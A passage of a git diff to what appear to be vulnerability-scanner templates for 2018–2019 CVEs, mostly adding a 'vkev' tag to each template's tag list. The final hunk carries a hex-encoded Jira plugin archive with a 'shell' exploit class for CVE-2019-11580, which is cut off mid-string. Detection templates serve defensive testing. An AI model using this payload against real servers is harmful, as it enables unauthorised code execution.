cve2018,cve,ericsson,lfi,traversal,edb,ericssonlg,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 84906a69b1b..dba3fc86d8c 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dlink product: central_wifimanager - tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast + tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 49c64ce2aaf..74e3aeea0b3 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -36,7 +36,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive + tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index 9acd07f8835..1aa33b8f745 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: endress product: wirelesshart_fieldgate_swg70_firmware - tags: cve,cve2018,iot,lfi,edb,endress + tags: cve,cve2018,iot,lfi,edb,endress,vkev http: - method: POST diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 652a7a870cd..8a86f66e435 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -31,7 +31,7 @@ info: framework: wordpress shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: body="/wp-content/plugins/gift-voucher/" - tags: time-based-sqli,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen + tags: time-based-sqli,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index a5d360720ca..764057c1597 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: jpcert product: logontracer - tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert + tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 0ca20d2e717..6fe008a7aa7 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: circontrol product: circarlife_scada - tags: cve,cve2018,scada,plc,iot,disclosure,edb,circarlife,circontrol + tags: cve,cve2018,scada,plc,iot,disclosure,edb,circarlife,circontrol,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 3e8059df2a7..77e9856a940 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"fuel cms" fofa-query: title="fuel cms" google-query: intitle:"fuel cms" - tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio + tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 9e803d16a8e..f02ccdd7c37 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: rubedo_project product: rubedo - tags: cve2018,cve,rubedo,lfi,edb,rubedo_project + tags: cve2018,cve,rubedo,lfi,edb,rubedo_project,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 043ca3fa4b6..d8133064e85 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"kibana" fofa-query: title="kibana" google-query: intitle:"kibana" - tags: cve,cve2018,lfi,kibana,vulhub,elastic + tags: cve,cve2018,lfi,kibana,vulhub,elastic,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index ce03814f002..084ec77e0b6 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -27,7 +27,7 @@ info: vendor: arkextensions product: jck_editor framework: joomla\! - tags: cve,cve2018,packetstorm,edb,joomla,sqli,arkextensions,joomla\! + tags: cve,cve2018,packetstorm,edb,joomla,sqli,arkextensions,joomla\!,vkev variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-17283.yaml b/http/cves/2018/CVE-2018-17283.yaml index 48bb23a84ac..f4ea3c3a365 100644 --- a/http/cves/2018/CVE-2018-17283.yaml +++ b/http/cves/2018/CVE-2018-17283.yaml @@ -23,7 +23,7 @@ info: product: manageengine_opmanager shodan-query: http.title:"OpManager" fofa-query: title="OpManager" - tags: cve,cve2018,oputils,zoho,opmanager,sqli,time-based-sqli + tags: cve,cve2018,oputils,zoho,opmanager,sqli,time-based-sqli,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 37e00c4e456..715f7c4553e 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: comodo product: unified_threat_management_firewall - tags: cve,cve2018,comodo,rce,edb + tags: cve,cve2018,comodo,rce,edb,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 9f1d668cafc..218a1a62e02 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microstrategy product: microstrategy_web - tags: cve2018,cve,microstrategy,xss,edb,packetstorm,intrusive + tags: cve2018,cve,microstrategy,xss,edb,packetstorm,intrusive,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index a75e20fcef1..9c9900feecf 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -33,7 +33,7 @@ info: - html:"jasperserver-pro" - http.html:"jasperserver-pro" fofa-query: body="jasperserver-pro" - tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco + tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-19127.yaml b/http/cves/2018/CVE-2018-19127.yaml index 669f67b6eaf..6cd67a6489e 100644 --- a/http/cves/2018/CVE-2018-19127.yaml +++ b/http/cves/2018/CVE-2018-19127.yaml @@ -29,7 +29,7 @@ info: fofa-query: body="Powered by phpcms" vendor: phpcms product: phpcms-2008 - tags: cve,cve2018,phpcms,rce,ssti + tags: cve,cve2018,phpcms,rce,ssti,vkev flow: http(1) || http(2) diff --git a/http/cves/2018/CVE-2018-19207.yaml b/http/cves/2018/CVE-2018-19207.yaml index a17b7cf4c41..1ea748752c4 100644 --- a/http/cves/2018/CVE-2018-19207.yaml +++ b/http/cves/2018/CVE-2018-19207.yaml @@ -23,7 +23,7 @@ info: framework: wordpress publicwww-query: "wp-content/plugins/wp-gdpr-compliance/" verified: true - tags: cve,cve2018,wordpress,wp-plugin,wp-gdpr-compliance,rce + tags: cve,cve2018,wordpress,wp-plugin,wp-gdpr-compliance,rce,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-19276.yaml b/http/cves/2018/CVE-2018-19276.yaml index c2f6b15a887..c1c5562ac14 100644 --- a/http/cves/2018/CVE-2018-19276.yaml +++ b/http/cves/2018/CVE-2018-19276.yaml @@ -24,7 +24,7 @@ info: vendor: openmrs product: openmrs shodan-query: html:"OpenMRS" - tags: cve,cve20218,openmrs,deserialization,rce + tags: cve,cve20218,openmrs,deserialization,rce,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 95ae7202114..ce6823d4c5c 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -31,7 +31,7 @@ info: - cpe:"cpe:2.3:a:wowza:streaming_engine" fofa-query: title="manager" product:"wowza streaming engine" google-query: intitle:"manager" product:"wowza streaming engine" - tags: cve2018,cve,wowza,lfi + tags: cve2018,cve,wowza,lfi,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-19410.yaml b/http/cves/2018/CVE-2018-19410.yaml index 85db40e4f46..0a1887936f4 100644 --- a/http/cves/2018/CVE-2018-19410.yaml +++ b/http/cves/2018/CVE-2018-19410.yaml @@ -27,7 +27,7 @@ info: - icon_hash=-655683626 - title="prtg" google-query: intitle:"prtg" - tags: cve,cve2018,prtg,lfi,kev + tags: cve,cve2018,prtg,lfi,kev,vkev variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2018/CVE-2018-20062.yaml b/http/cves/2018/CVE-2018-20062.yaml index 8a96b4c1d2f..44804ff92cd 100644 --- a/http/cves/2018/CVE-2018-20062.yaml +++ b/http/cves/2018/CVE-2018-20062.yaml @@ -23,7 +23,7 @@ info: fofa-query: app="ThinkPHP" verified: true max-request: 1 - tags: cve,cve2018,kev,thinkphp,rce + tags: cve,cve2018,kev,thinkphp,rce,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index 1afc2f2a98c..e9967a693ea 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -30,7 +30,7 @@ info: vendor: jsmol2wp_project product: jsmol2wp framework: wordpress - tags: cve,cve2018,wp,wp-plugin,wordpress,jsmol2wp,wpscan,traversal,jsmol2wp_project + tags: cve,cve2018,wp,wp-plugin,wordpress,jsmol2wp,wpscan,traversal,jsmol2wp_project,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 4cd2075f857..d0074ce85e7 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sahipro product: sahi_pro - tags: cve2018,cve,lfi,packetstorm,sahipro + tags: cve2018,cve,lfi,packetstorm,sahipro,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index ce3414a2e92..faf45cef571 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -34,7 +34,7 @@ info: google-query: - intitle:"Roxy file manager" - intitle:"roxy file manager" - tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman + tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml index 03f9ee223ce..2a037d31ae5 100644 --- a/http/cves/2018/CVE-2018-2392.yaml +++ b/http/cves/2018/CVE-2018-2392.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: sap product: internet_graphics_server - tags: cve,cve2018,sap,igs,xxe,xmlchart,msf,intrusive + tags: cve,cve2018,sap,igs,xxe,xmlchart,msf,intrusive,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index 26b66f8b90c..8dc4914a0db 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -32,7 +32,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve2018,cve,oracle,weblogic,rce,vulhub,intrusive + tags: cve2018,cve,oracle,weblogic,rce,vulhub,intrusive,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index 7e75ce82d4e..bd98452357b 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: redhat product: cloudforms - tags: cve2018,cve,rails,lfi,ruby,vulhub,seclists,redhat + tags: cve2018,cve,rails,lfi,ruby,vulhub,seclists,redhat,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index 1a15a244621..b0aaf2ba832 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -28,7 +28,7 @@ info: vendor: oturia product: smart_google_code_inserter framework: wordpress - tags: cve,cve2018,wordpress,google,edb,oturia + tags: cve,cve2018,wordpress,google,edb,oturia,vkev http: - method: POST diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index 5040083819a..5147417fa55 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: dlink product: dir-860l_firmware - tags: cve,cve2018,d-link,rce,oast,unauth,kev,dlink + tags: cve,cve2018,d-link,rce,oast,unauth,kev,dlink,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-6605.yaml b/http/cves/2018/CVE-2018-6605.yaml index 29f54825516..146449092d7 100644 --- a/http/cves/2018/CVE-2018-6605.yaml +++ b/http/cves/2018/CVE-2018-6605.yaml @@ -26,7 +26,7 @@ info: fofa-query: - app="Joomla!-网站安装" - app="joomla!-网站安装" - tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project + tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project,vkev variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 807fb06a5d3..ce17add845d 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -31,7 +31,7 @@ info: fofa-query: title="printmonitor" google-query: intitle:"printmonitor" product": printmonitor - tags: time-based-sqli,cve2018,cve,sqli,printmonitor,unauth,titool + tags: time-based-sqli,cve2018,cve,sqli,printmonitor,unauth,titool,vkev variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2018/CVE-2018-7314.yaml b/http/cves/2018/CVE-2018-7314.yaml index 30dc43ee3a9..c7180e61e75 100644 --- a/http/cves/2018/CVE-2018-7314.yaml +++ b/http/cves/2018/CVE-2018-7314.yaml @@ -27,7 +27,7 @@ info: fofa-query: - app="Joomla!-网站安装" - app="joomla!-网站安装" - tags: cve,cve2018,joomla,sqli,mlwebtechnologies + tags: cve,cve2018,joomla,sqli,mlwebtechnologies,vkev variables: num: "{{rand_int(800000000, 1000000000)}}" diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index 291af713d6c..ac1149b6f35 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -29,7 +29,7 @@ info: vendor: siteeditor product: site_editor framework: wordpress - tags: cve2018,cve,wordpress,wp-plugin,lfi,edb,seclists,siteeditor + tags: cve2018,cve,wordpress,wp-plugin,lfi,edb,seclists,siteeditor,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 8e0117b6524..fcc5435e5ed 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive + tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index 017997d9602..21bd72c948a 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -29,7 +29,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb + tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 9e5f9215d68..31b1d6f5462 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -34,7 +34,7 @@ info: fofa-query: - body="dedecms" - app="dedecms" - tags: cve,cve2018,dedecms,rce + tags: cve,cve2018,dedecms,rce,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-7841.yaml b/http/cves/2018/CVE-2018-7841.yaml index 53aea5a9bd8..663d7069df7 100644 --- a/http/cves/2018/CVE-2018-7841.yaml +++ b/http/cves/2018/CVE-2018-7841.yaml @@ -29,7 +29,7 @@ info: vendor: schneider-electric product: u.motion_builder shodan-query: http.headers_hash:1985490094 - tags: cve,cve2018,schneider-electric,rce,kev,oast,oob + tags: cve,cve2018,schneider-electric,rce,kev,oast,oob,vkev variables: oast: "{{interactsh-url}}" diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 579cb6f98ae..e7474c8decc 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -35,7 +35,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:activemq" - product:"activemq openwire transport" - tags: cve2018,cve,apache,activemq,xss + tags: cve2018,cve,apache,activemq,xss,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index a883a9a891f..0221bdcdde1 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -29,7 +29,7 @@ info: vendor: 99robots product: wp_background_takeover_advertisements framework: wordpress - tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots + tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index d819e800a05..b30b0b7ae25 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -25,7 +25,7 @@ info: vendor: drupal product: avatar_uploader shodan-query: http.component:"drupal" - tags: cve,cve2018,lfi,drupal,edb + tags: cve,cve2018,lfi,drupal,edb,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml index f2e80580246..3f9a20853c1 100644 --- a/http/cves/2018/CVE-2018-9995.yaml +++ b/http/cves/2018/CVE-2018-9995.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: tbkvision product: tbk-dvr4216_firmware - tags: cve,cve2018,auth-bypass,tbk,edb,tbkvision + tags: cve,cve2018,auth-bypass,tbk,edb,tbkvision,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index 60df90b2353..0b417676546 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -23,7 +23,7 @@ info: product: solr shodan-query: title:"Solr" fofa-query: title="Solr - tags: cve,cve2019,apache,solr,deserialization,rce,oast + tags: cve,cve2019,apache,solr,deserialization,rce,oast,vkev flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 19940345358..9f16bb1e225 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -38,7 +38,7 @@ info: google-query: - intitle:"apache solr" - intitle:"solr admin" - tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub + tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-0232.yaml b/http/cves/2019/CVE-2019-0232.yaml index 08343298d64..51dadf0a168 100644 --- a/http/cves/2019/CVE-2019-0232.yaml +++ b/http/cves/2019/CVE-2019-0232.yaml @@ -33,7 +33,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve,cve2019,packetstorm,seclists,apache,tomcat + tags: cve,cve2019,packetstorm,seclists,apache,tomcat,vkev variables: sid: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-1003000.yaml b/http/cves/2019/CVE-2019-1003000.yaml index 941086b5341..b664c8f0ad7 100644 --- a/http/cves/2019/CVE-2019-1003000.yaml +++ b/http/cves/2019/CVE-2019-1003000.yaml @@ -25,7 +25,7 @@ info: max-request: 6 vendor: jenkins product: script_security - tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated + tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated,vkev variables: username: admin diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index f006ef153bc..458f047edc6 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -28,7 +28,7 @@ info: vendor: kentico product: kentico shodan-query: cpe:"cpe:2.3:a:kentico:kentico" - tags: cve,cve2019,kentico,iis,packetstorm,rce,deserialization,kev,msf + tags: cve,cve2019,kentico,iis,packetstorm,rce,deserialization,kev,msf,vkev http: - method: POST diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index d3aac0adac7..f4fe02deb50 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -32,7 +32,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve,cve2019,redirect,apache,server + tags: cve,cve2019,redirect,apache,server,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index 473784022ea..bd1c422270f 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: teclib-edition product: gestionnaire_libre_de_parc_informatique - tags: cve,cve2019,glpi,sqli,injection,teclib-edition + tags: cve,cve2019,glpi,sqli,injection,teclib-edition,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 8443440cd02..2d266ded4cd 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -31,7 +31,7 @@ info: - http.title:"mongo express" fofa-query: title="mongo express" google-query: intitle:"mongo express" - tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js + tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 1c5772409b1..95b0bab7b0f 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -33,7 +33,7 @@ info: - title="kubernetes web view" - app="kubernetes-enterprise-manager" google-query: intitle:"kubernetes web view" - tags: cve2019,cve,debug,kubernetes,kubelet,devops,unauth,disclosure + tags: cve2019,cve,debug,kubernetes,kubelet,devops,unauth,disclosure,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 8d8a74b9a2f..6a4280231c5 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -32,7 +32,7 @@ info: - http.html:"pCOWeb" - http.html:"pcoweb" fofa-query: body="pcoweb" - tags: cve,cve2019,pcoweb,xss,carel,edb + tags: cve,cve2019,pcoweb,xss,carel,edb,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 9a266a8584e..ea62dbf901e 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -34,7 +34,7 @@ info: - body="welcome.cgi?p=logo" - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" - tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev,ivanti + tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev,ivanti,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 279ec5f848f..3f4781cb673 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -29,7 +29,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth + tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth,vkev variables: plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e0314000000